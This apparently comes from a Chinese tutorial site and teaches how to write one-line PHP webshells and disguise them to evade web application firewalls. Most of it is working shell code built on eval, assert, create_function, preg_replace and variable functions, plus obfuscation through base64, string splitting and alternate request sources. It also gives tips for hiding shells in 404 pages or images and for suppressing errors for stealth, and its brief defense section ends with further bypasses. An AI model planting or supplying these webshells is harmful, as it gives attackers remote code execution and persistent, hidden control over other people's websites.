php一句话木马变形技巧

admin3年前PHP教程68
一、什么是一句话木马?

一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。

二、我们如何发送命令,发送的命令如何执行?

我们可以通过 GET、POST、COOKIE这三种方式向一个网站提交数据,一句话木马用 $_GET[" "]、$_POST[" "]、$_COOKIE[" "]接收我们传递的数据,并把接收的数据传递给一句话木马中执行命令的函数,进而执行命令。 所以看到的经典一句话木马大多都是只有两个部分,一个是可以执行代码的函数部分,一个是接收数据的部分。

0.eval函数

<?php eval($_POST["a"]) ?>

其中eval就是执行命令的函数,**$_POST[‘a"]**就是接收的数据。eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们传递过去的任意PHP语句。这便是一句话木马的强大之处。

因为木马是接收post请求中 “a” 的数据( $_POST[‘a"]),所以我们必须以post方法发送数据并且将我们要执行的代码赋值给“a”。如果把木马中的post替换成get,那么我么就需要以GET方法发送“a”,

使用 其他函数制作一句话木马

1.assert函数

<?php assert(@$_POST["a"]); ?>

2.create_function函数

<?php$fun = create_function("",$_POST["a"]);$fun();?>

把用户传递的数据生成一个函数fun(),然后再执行fun()

3. call_user_func回调函数

<?php@call_user_func(assert,$_POST["a"]);?>

call_user_func这个函数可以调用其它函数,被调用的函数是call_user_func的第一个函数,被调用的函数的参数是call_user_func的第二个参数

这样的一个语句也可以完成一句话木马。一些被waf拦截的木马可以配合这个函数绕过waf。

4.preg_replace函数

<?php@preg_replace("/abcde/e", $_POST["a"], "abcdefg");?>

这个函数原本是利用正则表达式替换符合条件的字符串,但是这个函数有一个功能――可执行命令

这个函数的第一个参数是正则表达式,按照PHP的格式,表达式在两个“/”之间。如果我们在这个表达式的末尾加上“e”,那么这个函数的第二个参数就会被当作代码执行。

5. file_put_contents函数

利用函数生成木马

<?php$test="<?php $a=$_POST["cmd"];assert($a); ?>";file_put_contents("Trojan.php", $test);?>

函数功能:生成一个文件,第一个参数是文件名,第二个参数是文件的内容。

6.array数组

<?php$a="assert";array_map("$a",$_REQUEST);?>

上述定义参数a并赋值‘assert",利用array_map()函数将执行语句进行拼接。最终实现assert($_REQUEST)。

<?php$item["JON"]="assert";$array[]=$item;$array[0]["JON"]($_POST["TEST"]);?>

利用函数的组合效果,使得多个参数在传递后组合成一段命令并执行。

7.PHP变量函数

<?php$a = "eval";$a(@$_POST["a"]);?>

第三行使用了变量函数$a,变量储存了函数名eval,便可以直接用变量替代函数名。

三、如何让一句话木马绕过waf ?

waf是网站的防火墙,例如安全狗就是waf的一种。waf通常以关键字判断是否为一句话木马,但是一句话木马的变形有很多种,waf根本不可能全部拦截。想要绕过waf,需要掌握各种PHP小技巧,掌握的技巧多了,把技巧结合起来,设计出属于自己的一句话木马。

1.PHP可变变量

<?php$bb="eval";$aa="bb";$$aa($_POST["a"]);?>

看这句就能理解上述语句:$$aa = ( ( (aa) = $ (‘bb") = $bb = “eval”

2.str_replace函数

<?php$a=str_replace("Waldo", "", "eWaldoval");$a(@$_POST["a"]);?>

函数功能:在第三个参数中,查找第一个参数,并替换成第二个参数。这里第二个参数为空字符串,就相当于删除"Waldo"。

3. base64_decode函数

<?php$a=base64_decode("ZXZhbA==")$a($_POST["a"]);?>

这里是base64解密函数,"ZXZhbA=="是eval的base64加密。

4."."操作符

<?php$a="e"."v";$b="a"."l";$c=$a.$b;$c($_POST["a"]);?>

5.parse_str函数

<?php$str="a=eval";parse_str($str);$a($_POST["a"]);?>

执行这个函数后,生成一个变量$a,值为字符串"eval"

6.更换数据来源

6.1GET篇

<?php $_GET[a]($_GET[b]);?>

<?php @eval( $_GET[$_GET[b]])>

利用方法:

b=cmd&cmd=phpinfo()

6.2利用script代替<? 、?>标签

<script language="php">@eval_r($_GET[b])</script>

6.3利用session

7.字符替换或特殊编码

8.木马藏匿

1.404页面

2.图片木马,用文件包含调用

四、总结

绕过技巧:

更换执行数据来源字符替换或者编码采取隐匿手段

tips:使用一句话木马的时候可以在函数前加”@”符,这个符号让php语句不显示错误信息,增加隐蔽性。

五、防御

1.禁用assert()函数,监控eval()
2.搜索日志的assert。
亦可能绕过:

<?php $c=$_GET[n]."t"; @$c($_POST[cmd]); ?>

<?php $c=base64_decode("YXNzZXI=").$_GET[n]."t"; @$c($_POST[cmd]); ?>

以上就是php一句话木马变形技巧的详细内容,更多关于php一句话木马变形技巧的资料请关注其它相关文章!

免责声明:本文内容来自用户上传并发布,站点仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。请核实广告和内容真实性,谨慎使用。

相关文章

企业为什么要选择租用宁波高防服务器来防御ddos攻击

企业为什么要选择租用宁波高防服务器来防御ddos攻击?企业选择租用宁波高防服务器来防御DDoS攻击的原因有以下几点:高防服务器具有强大的防御能力:高防服务器可以通过多种方式,如流量清洗、黑白名单过滤、...

php自动加载代码实例详解

1. 让我们为 PHP 创建枚举,提供一些代码示例如果我们的代码需要对枚举常量和值进行更多验证,该怎么办?根据使用情况,我通常会使用类似以下的简单内容:abstract class DaysOfWee...

日本服务器可以用来做什么

日本服务器可以用来做什么?日本服务器可以用于各种不同的目的,例如:网站托管:您可以将自己的网站托管在日本服务器上,以提高网站的访问速度和性能,并为用户提供更好的使用体验。游戏服务器:日本是一个游戏文化...

PHP解决输出中文乱码问题讲解

解决 php 输出中文乱码的问题问题描述今天给导航狗(daohanggou/)的 php 程序和数据库文件迁移了服务器, 但是迁移到新的服务器上之后 php 输出的中文和 php 输出的从 mysql...

ajax和axios区别(ajax被什么代替了)

ajax和axios区别1、理论差异axios是通过Promise完成对ajax技术的一种封装,就像jquery对ajax的封装一样。ajax技术完成了部分数据的刷新,axios完成了对ajax的封装...

gpu服务器能干什么?租用江西GPU服务器怎么使用?

GPU服务器又被称为显卡服务器,是基于GPU的应用于视频编解码、深度学习、科学计算等多种场景的快速、稳定、弹性的计算服务。GPU加速计算可以提供非凡的应用程序性能,能将应用程序计算密集部分的工作负载转...